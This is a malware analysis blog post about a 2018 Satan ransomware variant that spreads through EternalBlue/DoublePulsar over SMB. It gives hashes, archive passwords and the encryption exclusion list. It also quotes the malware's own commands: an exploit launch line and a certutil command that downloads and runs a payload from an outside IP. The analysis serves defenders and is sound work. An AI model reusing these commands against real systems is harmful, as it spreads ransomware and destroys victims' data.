Today, MalwareHunterTeam reached out to me about a possible new variant of Satan ransomware.
Satan ransomware itself has been around since January 2017 as reported by Bleeping Computer.
In this blog post we’ll analyse a new version of the infamous Satan ransomware, which since November 2017 has been using the EternalBlue exploit to spread via the network, and consequently encrypt files.
First up is a file inconspicuously named “sts.exe”, which may refer to “Satan spreader”.
- MD5: 12bc52fd9da66db3e63bfb196ceb9be6
- SHA1: 4508e3442673c149b31e3fffc29cc95f834975bc
- SHA256: b686cba1894f8ab5cec0ce5db195022def00204f6cd143a325608ec93e8b74ee
- Compilation timestamp: 2018-04-14 06:33:08
- VirusTotal report:
|Figure 1 – download and extract two new files|
- ms.exe has password: iamsatancryptor
- client.exe has password: abcdefghijklmn
|Figure 2 – UAC prompt|
Client.exe (94868520b220d57ec9df605839128c9b) is, as mentioned earlier, an SFX archive and will hold the actual Satan ransomware, named “Cryptor.exe”. Figure 2 shows the command line options.
|Figure 3 – End of setup screen|
ms.exe (770ddc649b8784989eed4cee10e8aa04) on the other hand will drop and load the EternalBlue exploit, and starts scanning for vulnerable hosts. Required files will be dropped in the C:\ProgramData folder, as seen in Figure 3. Note it uses a publicly available implementation of the exploit – it does not appear to use its own.
cmd /c cd /D C:\Users\Alluse~1\&blue.exe –TargetIp & star.exe –OutConfig a –TargetPort 445 –Protocol SMB –Architecture x64 –Function RunDLL –DllPayload down64.dll –TargetIp
|Figure 4 – Spreading attempt over SMB, port 445|
down64.dll (17f8d5aff617bb729fcc79be322fcb67) will be loaded in memory using DoublePulsar, and executes the following command:
cmd.exe /c certutil.exe -urlcache -split -f http://22.214.171.124/cab/sts.exe c:/sts.exe&c:\sts.exe
This payload is also packed with PECompact 2. As usual, any database-related services and processes will be stopped and killed, which it does to also encrypt those files possibly in use by another process.
|Figure 5 – Database-related processes|
What’s new in this version of Satan, is that the exclusion list has changed slightly – it will not encrypt files with the following words in its path:
windows, python2, python3, microsoft games, boot, i386, ST_V22, intel, dvd maker, recycle, libs, all users, 360rec, 360sec, 360sand, favorites, common files, internet explorer, msbuild, public, 360downloads, windows defen, windows mail, windows media pl, windows nt, windows photo viewer, windows sidebar, default user
|Figure 6 – Ransom note|
GET /data/token.php?status=ST&code=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.1Connection: Keep-AliveUser-Agent: Winnet ClientHost: 126.96.36.199
2017-11-20 18:35:17 UTC ( 5 months ago )
For additional reading, read this excellent post by Tencent, who discovered a similar variant using EternalBlue earlier in April this year.
*** This is a Security Bloggers Network syndicated blog from Blaze's Security Blog authored by Bart. Read the original post at: https://bartblaze.blogspot.com/2018/04/satan-ransomware-adds-eternalblue.html